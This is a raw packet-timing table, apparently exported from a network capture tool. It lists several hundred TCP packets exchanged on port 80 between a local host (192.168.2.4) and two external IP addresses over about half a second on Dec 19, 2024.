                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.110003948 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.110157013 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.110208035 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.114506960 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.114558935 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.115016937 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.115165949 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.164747000 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.165133953 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.165143967 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.166596889 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.166646004 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.166762114 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.166843891 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.170612097 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.170988083 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.171041012 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.174474001 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.174680948 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.174737930 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.178744078 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.178795099 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.178803921 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.179409027 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.182401896 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.182467937 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.182657957 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.182708025 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.186034918 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.186301947 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.186381102 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.189893961 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.190043926 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.190099955 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.193464041 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.193634033 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.193701029 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.224239111 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.292728901 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.292846918 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.292944908 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.293833017 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.294087887 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.294159889 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.295761108 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.295819998 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.295958042 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.296056032 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.297840118 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.297907114 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.297920942 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.299381018 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.300076962 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.300510883 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.300580978 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.302527905 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.302674055 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.302676916 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.302956104 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.304948092 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.305152893 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.305222988 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.307020903 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.307079077 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.307116985 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.307312965 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.309762001 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.310719967 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.310813904 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.312376022 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.312442064 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.312607050 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.312699080 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.315031052 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.315108061 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.315184116 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.315234900 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.317509890 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.317590952 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.318103075 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.319560051 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.319638014 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.319806099 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.321758986 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.321825027 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.322139978 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.322187901 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323681116 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323815107 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323833942 CET8049774176.53.146.212192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323863029 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323909044 CET4977480192.168.2.4176.53.146.212
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.326000929 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.326078892 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.326107025 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.326154947 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.327658892 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.327737093 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.327765942 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.327879906 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.329545021 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.329797029 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.329857111 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.331413031 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.331590891 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.331650972 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.333583117 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.333703041 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.333908081 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.333972931 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.335611105 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.335680008 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.335802078 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.336339951 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.337171078 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.337248087 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.337529898 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.337579966 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.412571907 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.413105965 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.413243055 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.413815975 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.414143085 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.414216995 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.415994883 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.416147947 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.416213036 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.418489933 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.418504000 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.418570042 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.420717955 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.420973063 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.421039104 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.422962904 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.423341036 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.423351049 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.423393965 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.425132990 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.425203085 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.425616026 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.427160978 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.427242041 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.427321911 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.429507971 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.429595947 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.429842949 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.431377888 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.431621075 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.431684017 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.431838989 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.431884050 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.434094906 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.434108973 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.434175968 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.434211016 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.436482906 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.436496019 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.436547041 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.438500881 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.438894033 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.438972950 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.440511942 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.440673113 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.440748930 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.442868948 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.442950964 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.443015099 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.443142891 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.445040941 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.445115089 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.445190907 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.445245981 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.447324991 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.447408915 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.447422981 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.447648048 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.451092958 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.451375008 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.482366085 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.482701063 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.482778072 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.483388901 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.484144926 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.484210968 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.485688925 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.485754967 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.485919952 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.485971928 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.488245010 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.488394976 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.488466978 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.490488052 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.490758896 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.490839005 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.492420912 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.492505074 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.492598057 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.493319988 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.495045900 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.495115995 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.495352983 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.495412111 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.496967077 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.497042894 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.497160912 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.497401953 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.499736071 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.499819040 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.499898911 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.500226021 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.502300024 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.502383947 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.502393961 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.502446890 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.504544020 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.504585981 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.504626989 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.504667997 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.506870985 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.507359028 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.507407904 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.507529020 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.509135962 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.509237051 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.509311914 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.511039972 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.511122942 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.511188984 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.513335943 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.513442039 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.513684988 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.513797998 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.515619040 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.515762091 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.515846014 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.515894890 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.517837048 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.517899990 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.517925024 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.518666983 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.520412922 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.520478964 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.520639896 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.520697117 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.522867918 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.522933960 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.523000956 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.523050070 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.524813890 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.524936914 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.525003910 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.526643991 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.526715040 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.526782036 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.528439999 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.528507948 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.528577089 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.528667927 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.530534983 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.530602932 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.530810118 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.530888081 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.532612085 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.532675982 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.532793045 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.532844067 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.535058022 CET8049765185.215.113.206192.168.2.4
